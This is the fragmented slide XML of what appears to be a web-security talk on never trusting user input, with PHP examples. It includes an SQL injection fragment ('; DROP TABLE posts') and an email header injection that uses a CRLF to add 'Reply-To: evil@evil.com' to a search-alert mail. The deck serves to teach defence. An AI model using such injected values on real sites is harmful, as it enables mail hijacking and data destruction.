              <a:t>; DROP TABLE posts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04841F-1BE9-49D7-9DCA-3497D641B695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675909" y="7270865"/>
            <a:ext cx="0" cy="532014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192322-B018-4069-99F6-8B037DE6479F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3078895" y="1459255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5045253" y="294205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3796559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32EA9-91CB-4B7D-902D-6FBAC6D883BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="342900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Obligatory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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xkcd</a:t>
            </a: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Comic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4A3062-731D-4DB8-B465-956DE795A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1848012"/>
            <a:ext cx="11283949" cy="3473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230A1B-C0BB-404F-A721-DD4851E9B5BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9422340" y="6145768"/>
            <a:ext cx="231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https://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="851233449"/>
      </p:ext>
    </p:extLst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B97CF3-34DB-40B6-8567-2E15CCDBA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924" y="1638939"/>
            <a:ext cx="9001182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name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query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274796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803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E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>submit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altLang="en-US" sz="5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5F5035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A657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14" y="5199740"/>
            <a:ext cx="965200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$_GET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5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'query'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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="54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876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C637977-BF90-44E3-AE53-A863866C7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73" y="455916"/>
            <a:ext cx="4749501" cy="5946167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="139700" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="42000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:softEdge rad="25400"/>
          </a:effec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F2415CC-C628-44B0-AA8F-F48F1DE7C8F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5639535" y="3795788"/>
            <a:ext cx="5112647" cy="451592"/>
            <a:chOff x="5639535" y="3795788"/>
            <a:chExt cx="5112647" cy="451592"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;168;p22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A652397E-461B-418D-907E-81661A1B1584}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5925482" y="3795788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@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Ayeshlive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6D9F607-236E-4C4B-8A9C-0FE5272C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9535" y="3933854"/>
              <a:ext cx="313526" cy="31352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546B1A-9639-4DE7-8B88-F51AD3EB0A8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5639535" y="2930720"/>
            <a:ext cx="5140225" cy="427221"/>
            <a:chOff x="5639535" y="2930720"/>
            <a:chExt cx="5140225" cy="427221"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Google Shape;168;p22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CCC0D6-7F8B-400E-BD1C-BA0495810A15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5953060" y="2930720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https://ayesh.me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52AE958-0A1A-4C2D-B665-BFAB6D3C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9535" y="3044416"/>
              <a:ext cx="313525" cy="31352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1AB698E-5DA6-493B-98EB-E762DF1561C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5639535" y="3330538"/>
            <a:ext cx="5140225" cy="456514"/>
            <a:chOff x="5639535" y="3330538"/>
            <a:chExt cx="5140225" cy="456514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Google Shape;168;p22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8940CACF-C003-4F8C-B148-CDE20BF85921}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5953060" y="3330538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Ayesh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390ED1A-159B-47A1-AC77-D25A6BEF0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9535" y="3473527"/>
              <a:ext cx="313525" cy="313525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Google Shape;165;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6218A969-1744-4230-86D5-1D0730F91C92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5548985" y="928259"/>
            <a:ext cx="5490414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 Karunaratne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166;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5F6D47-3A44-422A-BD2D-04CE466B5D3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5548985" y="1403406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Freelance Software Developer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6A9681-510E-416E-8C96-379728D233F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639535" y="1460585"/>
            <a:ext cx="6126480" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom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149495-A811-4BAD-8CA1-72FD43CA6B85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5639535" y="4273682"/>
            <a:ext cx="5182934" cy="465851"/>
            <a:chOff x="5639535" y="4273682"/>
            <a:chExt cx="5182934" cy="465851"/>
          </a:xfrm>
        </p:grpSpPr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129698DB-C54D-4CBC-9D44-68D77FED4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535" y="4383299"/>
              <a:ext cx="356234" cy="356234"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Google Shape;168;p22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BAEA231-857D-4CE0-889C-909B41AFC5D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5995769" y="4273682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Ayesh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67144-671A-47FD-B99A-879214C3FC6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5618179" y="2474206"/>
            <a:ext cx="5134003" cy="455409"/>
            <a:chOff x="5618179" y="2474206"/>
            <a:chExt cx="5134003" cy="455409"/>
          </a:xfrm>
        </p:grpSpPr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486D9C5F-9C38-43E9-929E-DD44A633A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179" y="2573380"/>
              <a:ext cx="356235" cy="356235"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Google Shape;168;p22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B52E4E-5465-4644-93E5-03E0C3292752}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5925482" y="2474206"/>
              <a:ext cx="48267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/>
                  <a:ea typeface="Poppins"/>
                  <a:cs typeface="Poppins"/>
                  <a:sym typeface="Poppins"/>
                </a:rPr>
                <a:t>Kandy, Sri Lanka  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="3D3D3D"/>
                  </a:solidFill>
                  <a:latin typeface="Poppins"/>
                  <a:ea typeface="Poppins"/>
                  <a:cs typeface="Poppins"/>
                  <a:sym typeface="Poppins"/>
                </a:rPr>
                <a:t>- Everywhere</a:t>
              </a:r>
              <a:endParaRPr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95669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14" y="1569665"/>
            <a:ext cx="965200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$_GET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5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'query'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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="54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7AA73-1339-4112-B997-555E4B7C4052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2344620" y="3429000"/>
            <a:ext cx="83311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500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>From:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Site &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tracking@site.noob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6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en-US" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>To:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> site-owner@aol.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5035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500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Search alert for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="35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3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3500" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="35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110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14" y="1569665"/>
            <a:ext cx="965200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$_GET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5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'query'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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="54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DBE1D-6EB7-4009-90D4-70987F14780B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3732934" y="2534164"/>
            <a:ext cx="0" cy="41649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1B3492-B514-4781-8AEE-AA7063D604A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191970" y="3416325"/>
            <a:ext cx="519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From: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 Site &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>tracking@site.noob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&gt;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To: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 site-owner@aol.com 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Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5035"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> 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Search alert for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="797997"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$query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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial Unicode MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin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E0A7C-78B5-4381-BE67-C5DE8F19980C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3903415" y="3416325"/>
            <a:ext cx="8288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From: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 Site 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tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>@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site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.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noob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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To: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7144C4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>site-owner@aol.com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Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5035"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Search alert for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accidentally build a shelf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" alt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1356E-2D11-4546-B912-4A74EB100F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524625" y="2724150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Email sent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8052F8-35EF-4BD2-A596-5AA3012F6D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060614" y="2724150"/>
            <a:ext cx="151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PHP Template</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2098346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1681316" y="596430"/>
            <a:ext cx="833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accidentally build a shelf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\r\n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Reply-To: evil@evil.com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514" y="1569665"/>
            <a:ext cx="965200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5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5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="797997"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_GET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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'query'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808030"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="54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4400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="9600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3DBE1D-6EB7-4009-90D4-70987F14780B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3732934" y="2534164"/>
            <a:ext cx="0" cy="41649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1B3492-B514-4781-8AEE-AA7063D604A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191970" y="3416325"/>
            <a:ext cx="519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From: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 Site &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>tracking@site.noob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&gt;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To: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 site-owner@aol.com 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Arial Unicode MS"/>
              </a:rPr>
              <a:t>Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5035"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Search alert for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="797997"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial Unicode MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin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E0A7C-78B5-4381-BE67-C5DE8F19980C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3903415" y="3416325"/>
            <a:ext cx="8288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From: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 Site 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tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>@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site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7144C4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>noob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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To: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7144C4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>site-owner@aol.com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Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5035"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Search alert for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how did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accidentally build a shelf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr 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Reply-To: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5F5035"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil@evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" alt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45A93-82B9-4F70-A5A7-A895C7E7D4D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524625" y="2724150"/>
            <a:ext cx="11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Email sent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A0AC4-19EF-47EB-AC47-FEB252D50F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060614" y="2724150"/>
            <a:ext cx="151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PHP Template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B4E62E-27F6-4703-A5AD-190171BF89A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3903415" y="4267200"/>
            <a:ext cx="3087935" cy="349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Word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9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23063-FD29-49B3-A978-7A0D579106B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-758553" y="305068"/>
            <a:ext cx="133027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Never Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="18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Input!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1773291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C1F3229-A82E-4AA0-ABF7-09952A951F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3721100" y="1625600"/>
            <a:ext cx="4749800" cy="474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6F2D74-5521-4672-83EA-59C3DB05D803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8851900" y="2159000"/>
            <a:ext cx="4318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9E259-E17D-4A76-B2DF-A8D8916433E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9563099" y="2190234"/>
            <a:ext cx="74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CA8F7-976D-466C-A0B4-F0F3994374FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="342900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When to trust user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1965032156"/>
      </p:ext>
    </p:extLst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AEFF7-5EA9-4A3F-9B14-8EE635815765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635000" y="989379"/>
            <a:ext cx="761311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Form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URL query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URL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Database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User uploads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Incoming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Cookies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HTTP Headers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DNS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WHOIS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Environment variable</a:t>
            </a:r>
          </a:p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.. And everything else that comes from outside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ED746-AF5D-4CCA-B163-ED922C48755F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="342900"/>
            <a:ext cx="121919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What not to trust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180778616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AEA95550-7BC5-4A4B-9543-BE5FF4837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4" y="511485"/>
            <a:ext cx="10858771" cy="583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27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4D2385-6C8D-429D-A42A-4FB734FB6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357874"/>
            <a:ext cx="10074513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4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76BFDC-29AD-4996-BB0C-A9AB70C10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357874"/>
